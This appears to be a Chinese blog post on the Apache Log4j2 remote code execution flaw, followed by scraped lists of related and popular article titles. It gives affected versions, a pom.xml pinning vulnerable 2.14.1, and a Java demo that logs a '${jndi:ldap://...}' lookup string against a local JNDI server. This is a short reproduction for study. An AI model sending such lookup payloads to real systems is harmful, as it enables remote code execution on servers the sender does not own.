漏洞介绍

Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。

此次漏洞触发条件为只要外部用户输入的数据会被日志记录,即可造成远程代码执行

影响版本

Apache Log4j 2.x <= 2.14.1

漏洞复现

在IDEA中新建一个Maven项目,在pom.xml中导入依赖文件下载log4j程序包

pom.xml文件如下:

<dependencies><!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core --><dependency><groupId>org.apache.logging.log4j</groupId><artifactId>log4j-core</artifactId><version>2.14.1</version></dependency><!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-api --><dependency><groupId>org.apache.logging.log4j</groupId><artifactId>log4j-api</artifactId><version>2.14.1</version></dependency></dependencies>

下载相应程序包资源

使用JNDI注入工具开启rmi服务或者idap服务执行本地命令

测试Demo

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;public class Test {private static final Logger logger = LogManager.getLogger(Test.class);public static void main(String[] args) {logger.error("${jndi:ldap://127.0.0.1:1389/2ltqyh}");}
}

Apache Log4j2远程代码执行漏洞相关推荐

  1. Apache Log4j2远程代码执行漏洞攻击,华为云安全支持检测拦截

    近日,华为云安全团队关注到Apache Log4j2 的远程代码执行最新漏洞.Apache Log4j2是一款业界广泛使用的基于Java的日志工具,该组件使用范围广泛,利用门槛低,漏洞危害极大.华为云 ...

  2. 【紧急】Apache Log4j2 远程代码执行漏洞

    0x01 漏洞背景 12月9日,监测到网上披露Apache Log4j2 远程代码执行漏洞,由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特别构造的数据请求包,可 ...

  3. Apache Log4j2远程代码执行漏洞风险紧急通告,腾讯安全支持全面检测拦截

    腾讯安全注意到,一个Apache Log4j2的高危漏洞细节被公开,攻击者利用漏洞可以远程执行代码. 漏洞描述: 腾讯安全注意到,一个Apache Log4j2反序列化远程代码执行漏洞细节已被公开,L ...

  4. Apache Log4j2 远程代码执行 漏洞

    1.漏洞说明 Apache Log4j2是一个基于Java的日志记录工具.该工具重写了Log4j框架,并且引入了大量丰富的特性.该日志框架被大量用于业务系统开发,用来记录日志信息.大多数情况下,开发者 ...

  5. 分析Apache Log4j2 远程代码执行漏洞

    漏洞描述 Log4j是Apache的一个开源项目,通过使用Log4j,可以控制日志信息输送的目的地是控制台.文件.GUI组件,甚至是套接口服务器.NT的事件记录器.UNIX Syslog守护进程等:也 ...

  6. Apache Log4j2远程代码执行漏洞(CVE-2021-44228)

    发布日期:2021-12-12 名称:Apache Log4j2 Remote Code Execution Vulnerability (CVE-2021-44228) 级别:严重 描述信息:Apa ...

  7. 安全漏洞:Apache Log4j2 远程代码执行漏洞(CVE-2021-44228)

    阿里云漏洞库 (aliyun.com) 漏洞介绍 解决建议 1.排查应用是否引入了Apache log4j-core Jar包,若存在依赖引入,且在受影响版本范围内,则可能存在漏洞影响.同时为了避免在 ...

  8. Apache Log4j2 远程代码执行高危漏洞 解决方案

    新闻:https://view.inews.qq.com/a/20211210A05KTY00 博主其他文章 Log4j2 高危漏洞分析 简介: Apache Log4j2是一款优秀的Java日志框架 ...

  9. 快速修复 Log4j2 远程代码执行漏洞步骤

    点击关注公众号,实用技术文章及时了解 来源:blog.csdn.net/weixin_48990070/ article/details/121861553 目录 漏洞说明 修复步骤 下载源码zip包 ...

最新文章

  1. 第十六届全国大学智能车竞赛全国总决赛竞速组别成绩与奖项
  2. centos 编译 mysql_Centos Mysql 编译安装调试
  3. 成功解决 ValueError: feature_names mismatch training data did not have the following fields
  4. 运维前线:一线运维专家的运维方法、技巧与实践导读
  5. 【渝粤题库】陕西师范大学200481 高级英语(一)
  6. 【lucene】lucene高亮显示
  7. Node连接MySQL数据库进行基本的增删改查操作(一看就会)
  8. C# 索引器的简单例子
  9. 数据库类型约束自增长
  10. 计算机网络—数据链路层 网络层 传输层 应用层
  11. socket创建失败_python3从零学习-5.8.1、socket—底层网络接口
  12. videojs如何获取请求消息_WEB之基于HTTP协议的几种实时数据获取技术
  13. 怎么从抖音上直接跳转到微信呢?
  14. 立创开源 | 基于555定时器的电子琴设计
  15. bpm导出成html,一种基于BPM系统的EXECL导入免开发生成静态HTML表单的方法与流程...
  16. 汤姆猫炫跑鸿蒙,汤姆猫炫跑游戏怎么操作-玩法规则一览
  17. 计算机考研408真题(全国统考2009--2020)、985高校计算机考研资料(清北+北理+北邮+武大+华科+浙大+复旦+哈工大+西安交大+华南理工)、王道四件套、天勤四件套---百度网盘免费下载
  18. uniapp锚点定位
  19. c语言程序设计五子棋棋盘怎么画,五子棋的棋盘画不出来,求助!!
  20. 课设:指纹签到系统-支持PC网页端查看

热门文章

  1. CSS3 3D移动(translate3d)、透视(perspective)、3D旋转(rotate3d)、3D呈现(transform-style)
  2. 理解vSphere虚拟交换机中的VLAN类型
  3. 通过pygame实现的python飞机大战项目
  4. 简单ui效果实现,模仿腾讯体育点击全屏实现
  5. Openssl Encrypt
  6. encrypt 加密解密
  7. 如何用FMEA方法排除架构隐患
  8. 遇见一个百分之百的女孩
  9. Python数据分析实战-提取DataFrame(Excel)某列(字段)最全操作(附源码和实现效果)
  10. eclipse tomcat配置详解